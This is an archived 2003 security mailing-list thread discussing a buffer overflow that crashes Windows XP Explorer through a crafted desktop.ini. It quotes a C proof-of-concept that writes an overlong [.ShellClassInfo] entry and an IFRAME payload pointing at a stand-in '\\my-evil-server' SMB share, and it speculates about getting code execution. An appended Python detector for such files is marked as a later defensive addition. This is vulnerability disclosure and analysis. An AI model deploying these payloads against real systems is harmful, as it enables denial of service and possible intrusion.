I have been unable to reproduce it in this fashion; my quick-and-dirty guess is that explorer.exe does not attempt to interpret that file for remote (smb/etc) shares. However, if you do it from a _local_ share.... It still blows up quite nicely. :)

Regards,
Kristopher

On Sun, 2003-05-11 at 13:55, Berend-Jan Wever wrote:
> Could this not be done remotely without user interaction except browsing an
> evil website by using SMB ?
>
> <HTML><BODY>
> <IFRAME src="\\my-evil-server\">
> </BODY></HTML>
>
> You can make IE browse a harddisk whose contents you control...
>
> I don't have XP so I can't test this. Let me know what you find.
>
> Cheers,
>
> Berend-Jan Wever
>
> ----- Original Message -----
> From: "Kristopher Matthews" <krismat_private>
> To: "'Ryan Yagatich'" <ryanyat_private>
> Cc: <vuln-devat_private>
> Sent: Friday, May 09, 2003 18:42
> Subject: RE: Buffer overflow in Explorer.exe
>
>
> I have tested and duplicated this behavior on a fully patched/updated
> Windows XP Pro system.
>
> 1. The overflow is for that particular key, AFAICT.
> 1a. It will not work for the root (c:/) directory; explorer.exe does not
> parse 'desktop.ini' for that directory. It will, however, work for any other
> directory.
> 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
> looks for all the world like a standard buffer overflow; I believe a more
> carefully crafted 'desktop.ini' file could cause explorer.exe to
> unintentionally execute arbitrary code.
> 3. Download and execute untrusted code? Combine this with any of the other
> popular exploits for windows; also, it wouldn't be terribly hard to get a
> user to download a 'desktop.ini' file to their "My Documents" directory (in
> the guise of, say, a folder theme, which windows does support; e.g.
> different background, file layout, etc); bam, whenever they open that
> directory, explorer crashes.
>
> Regards,
> Kristopher
>
>
> -----Original Message-----
> From: Ryan Yagatich [mailto:ryanyat_private]
> Sent: Thursday, May 08, 2003 6:28 PM
> To: at4rat_private
> Cc: vuln-devat_private
>
> Hi,
> I don't quite understand the purpose behind this code. It creates
> a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
> contents of
>
>   [.ShellClassInfo]
>   AAAAAAAAAAAA {x2301}
>
> And then terminates? I don't have a windows machine available to
> really explore this any, but what makes that entry in desktop.ini cause
> this? Furthermore, is this issue only for that particular key or is it
> generally just key/excessive parameter/missing value size that is
> affected? And additionally, you mention that explorer will no longer be
> able to operate when trying to browse the hard disk, but does this mean
> globally, or when they try to browse the c:/ drive, or just that
> particular folder?
> Please send me more information about this, (even if it references
> past posts that I have missed) so that I can better understand the
> severity of this. Especially since to me, I still see it as someone needing
> to download and execute untrusted software which causes a system crash,
> and if that were going to happen there are far worse things that can be
> done besides creating a small text file.
>
> Thanks,
> Ryan Yagatich
>
>
> ,_____________________________________________________,
> \ Ryan Yagatich                       supportat_private \
> / Pantek Incorporated                   (877) LINUX-FIX /
> \ http://www.pantek.com/security        (440) 519-1802 \
> / Are your networks secure? Are you certain?           /
> \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\
>
> On Wed, 7 May 2003, aT4r InsaN3 wrote:
>
> > This bug allows a malicious attacker to execute data with privileges of a
> > user that is browsing the hard disk with explorer.
> >
> > tested against winxp SP1
> >
> > example code provided.
> >
> > <snip>
> >
> >   strcpy(path,"\\aT4r[at]3WDesign.es Security");
> >   mkdir(path);
> >   SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
> >
> >   strcat(path,"\\desktop.ini");
> >   bof=fopen(path,"w");
> >   fputs("[.ShellClassInfo]\n",bof);
> >   memset(evil,'A',BUFF);
> >   fputs(evil,bof);
> >   fclose(bof);
> >
> > <snip>
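A defender-side check for the desktop.ini pattern this thread discusses, added here as an example and not code from any of the posters: it reads the [.ShellClassInfo] section and flags entries longer than an assumed 256-byte threshold, which is this example's own choice rather than a documented Windows limit; the function names and the two sample files are likewise constructed.

```python
import os
import re

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
MAX_LEN = 256  # assumed threshold, not a documented Windows limit


def scan_desktop_ini(text, max_len=MAX_LEN):
    """Return (line_no, length) for every line under [.ShellClassInfo]
    longer than max_len. The whole raw line is measured, so an entry with
    no '=' at all (the shape of the posted PoC) is still flagged."""
    findings = []
    section = None
    for line_no, raw in enumerate(text.splitlines(), 1):
        m = SECTION_RE.match(raw)
        if m:
            section = m.group("name").strip().lower()
            continue
        if section == ".shellclassinfo" and len(raw) > max_len:
            findings.append((line_no, len(raw)))
    return findings


def scan_tree(root, max_len=MAX_LEN):
    """Walk root and map each desktop.ini path to its oversized entries.
    Files are opened by path, so hidden/read-only attributes do not matter."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1", errors="replace") as fh:
                findings = scan_desktop_ini(fh.read(), max_len)
            if findings:
                hits[path] = findings
    return hits


# Constructed samples: a legitimate folder customisation and the PoC's shape.
BENIGN = "[.ShellClassInfo]\nIconResource=shell32.dll,3\n"
MALICIOUS = "[.ShellClassInfo]\n" + "A" * 2048 + " {x2301}\n"

if __name__ == "__main__":
    print(scan_desktop_ini(BENIGN))     # []
    print(scan_desktop_ini(MALICIOUS))  # [(2, 2056)]
```

Running scan_tree over a user's profile directory gives an inventory of folders whose desktop.ini would trip the parser on open, which is the cheapest place to look before anyone double-clicks.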
This archive was generated by hypermail 2b30 : Mon May 12 2003 - 19:52:44 PDT